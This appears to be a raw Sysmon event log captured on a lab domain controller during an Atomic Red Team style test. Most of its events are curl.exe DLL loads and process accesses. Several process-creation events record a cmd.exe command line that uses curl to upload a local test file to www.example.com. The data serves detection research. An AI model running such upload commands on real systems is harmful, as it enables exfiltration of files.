15:34:46.164{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000055301735Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.164{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000055301734Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.164{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000055301733Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.163{8B6011A9-C6FA-616E-9C35-01000000F101}41365516C:\Windows\system32\conhost.exe{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000055301732Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.163{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000055301731Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.162{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000055301730Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.146{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 10341000x800000000000000055301729Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.146{8B6011A9-887D-6164-2700-00000000F101}28562088C:\Windows\sysmon64.exe{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ntdll.dll+6cd0a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16c29|C:\Windows\sysmon64.exe+1938c|C:\Windows\sysmon64.exe+11484|C:\Windows\sysmon64.exe+b0591|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000055301728Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.146{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exeC:\Windows\System32\Curl.exe7.79.1The curl executableThe curl executablecurl, https://curl.se/curl.exeMD5=46A8FE9CE08112D542220E850323D334,SHA256=7F43DE7FB365D85CF8FEE0EC66D43B09FB3D559B02A432E5925E3748BC3BD528false-Unavailable 10341000x800000000000000055301726Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.146{8B6011A9-888A-6164-7000-00000000F101}34483876C:\Windows\system32\csrss.exe{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000055301725Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.146{8B6011A9-E695-618B-D0A5-04000000F101}74967716C:\Windows\system32\cmd.exe{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000055301724Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.160{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exe7.79.1The curl executableThe curl executablecurl, https://curl.se/curl.exeC:\Windows\System32\Curl.exe --data c:\temp\atomictestfile.txt www.example.com C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=46A8FE9CE08112D542220E850323D334,SHA256=7F43DE7FB365D85CF8FEE0EC66D43B09FB3D559B02A432E5925E3748BC3BD528{8B6011A9-E695-618B-D0A5-04000000F101}7496C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo "This is an Atomic Test File" c:\temp\atomictestfile.txt & C:\Windows\System32\Curl.exe -T c:\temp\atomictestfile.txt www.example.com & C:\Windows\System32\Curl.exe --upload-file c:\temp\atomictestfile.txt www.example.com & C:\Windows\System32\Curl.exe -d c:\temp\atomictestfile.txt www.example.com & C:\Windows\System32\Curl.exe --data c:\temp\atomictestfile.txt www.example.com" 534500x800000000000000055301723Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.146{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exe 734700x800000000000000055301722Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.084{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000055301721Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.084{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exeC:\Windows\System32\FWPUCLNT.DLL10.0.14393.0 (rs1_release.160715-1616)FWP/IPsec User-Mode APIMicrosoft® Windows® Operating SystemMicrosoft Corporationfwpuclnt.dllMD5=A65FA613342B08E0F760D8B13B9C135A,SHA256=C64A1EC862188D2EE1202DB02BFBF4E2DD56780905E509012799EB57FC9A88EDtrueMicrosoft WindowsValid 12241200x800000000000000055301720Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:34:46.084{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000055301719Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:34:46.084{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000055301718Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:34:46.084{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000055301717Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:34:46.084{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x800000000000000055301716Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.084{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exeC:\Windows\System32\rasadhlp.dll10.0.14393.0 (rs1_release.160715-1616)Remote Access AutoDial HelperMicrosoft® Windows® Operating SystemMicrosoft Corporationrasadhlp.dllMD5=FAE8D0480BDD905EEA453D3A57C8D5C6,SHA256=C1531223B8201B344A6A6474CB2D9B8A8C632250A3A6F472EC5E2D7D28ADD94CtrueMicrosoft WindowsValid 12241200x800000000000000055301715Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:34:46.084{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000055301714Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:34:46.084{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000055301713Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:34:46.084{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x800000000000000055301712Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.084{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27trueMicrosoft WindowsValid 734700x800000000000000055301711Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.084{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9trueMicrosoft WindowsValid 734700x800000000000000055301710Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.084{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exeC:\Windows\System32\mswsock.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft Windows Sockets 2.0 Service ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationmswsock.dllMD5=B52ACA309FD6F72105951FFBA022327B,SHA256=02AB6CCE4BF0D3F075D5E982F5A4CBDB514CE7C245EA474D7846A86CD3F13202trueMicrosoft WindowsValid 734700x800000000000000055301709Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.084{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValid 734700x800000000000000055301708Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.084{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x800000000000000055301707Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.084{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x800000000000000055301706Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.084{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000055301705Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.084{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000055301704Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.084{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000055301703Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.068{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000055301702Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.068{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000055301701Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.068{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000055301700Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.068{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000055301699Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.068{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exeC:\Windows\System32\msasn1.dll10.0.14393.0 (rs1_release.160715-1616)ASN.1 Runtime APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationmsasn1.dllMD5=299464D218A27B56684B715365D149FE,SHA256=2BFE4014E06552A9D4201EF9D1C605694AAF2B7B811265EFD91FC6D1C2D48242trueMicrosoft WindowsValid 734700x800000000000000055301698Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.068{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000055301697Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.068{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exeC:\Windows\System32\crypt32.dll10.0.14393.4350 (rs1_release.210407-2154)Crypto API32Microsoft® Windows® Operating SystemMicrosoft CorporationCRYPT32.DLLMD5=95BA70CFA8087A209500D7D350BF3A59,SHA256=4265157E8DC2A0E32A6328D54181CC31FD24E3017E60B270623C2CDBE5FAB4FAtrueMicrosoft WindowsValid 734700x800000000000000055301696Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.068{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000055301695Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.068{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000055301694Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.068{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000055301693Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.068{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000055301692Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.068{8B6011A9-C6FA-616E-9C35-01000000F101}41365516C:\Windows\system32\conhost.exe{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000055301691Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.068{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000055301690Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.068{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 10341000x800000000000000055301689Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.068{8B6011A9-887D-6164-2700-00000000F101}28562088C:\Windows\sysmon64.exe{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ntdll.dll+6cd0a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16c29|C:\Windows\sysmon64.exe+1938c|C:\Windows\sysmon64.exe+11484|C:\Windows\sysmon64.exe+b0591|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000055301688Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.068{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000055301687Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.068{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exeC:\Windows\System32\Curl.exe7.79.1The curl executableThe curl executablecurl, https://curl.se/curl.exeMD5=46A8FE9CE08112D542220E850323D334,SHA256=7F43DE7FB365D85CF8FEE0EC66D43B09FB3D559B02A432E5925E3748BC3BD528false-Unavailable 10341000x800000000000000055301685Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.068{8B6011A9-888A-6164-7000-00000000F101}34483876C:\Windows\system32\csrss.exe{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000055301684Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.068{8B6011A9-E695-618B-D0A5-04000000F101}74967716C:\Windows\system32\cmd.exe{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8564|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000055301683Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.076{8B6011A9-E696-618B-D3A5-04000000F101}8360C:\Windows\System32\Curl.exe7.79.1The curl executableThe curl executablecurl, https://curl.se/curl.exeC:\Windows\System32\Curl.exe -d c:\temp\atomictestfile.txt www.example.com C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=46A8FE9CE08112D542220E850323D334,SHA256=7F43DE7FB365D85CF8FEE0EC66D43B09FB3D559B02A432E5925E3748BC3BD528{8B6011A9-E695-618B-D0A5-04000000F101}7496C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo "This is an Atomic Test File" c:\temp\atomictestfile.txt & C:\Windows\System32\Curl.exe -T c:\temp\atomictestfile.txt www.example.com & C:\Windows\System32\Curl.exe --upload-file c:\temp\atomictestfile.txt www.example.com & C:\Windows\System32\Curl.exe -d c:\temp\atomictestfile.txt www.example.com & C:\Windows\System32\Curl.exe --data c:\temp\atomictestfile.txt www.example.com" 534500x800000000000000055301682Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.068{8B6011A9-E696-618B-D2A5-04000000F101}8232C:\Windows\System32\Curl.exe 734700x800000000000000055301681Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.068{8B6011A9-E696-618B-D2A5-04000000F101}8232C:\Windows\System32\Curl.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 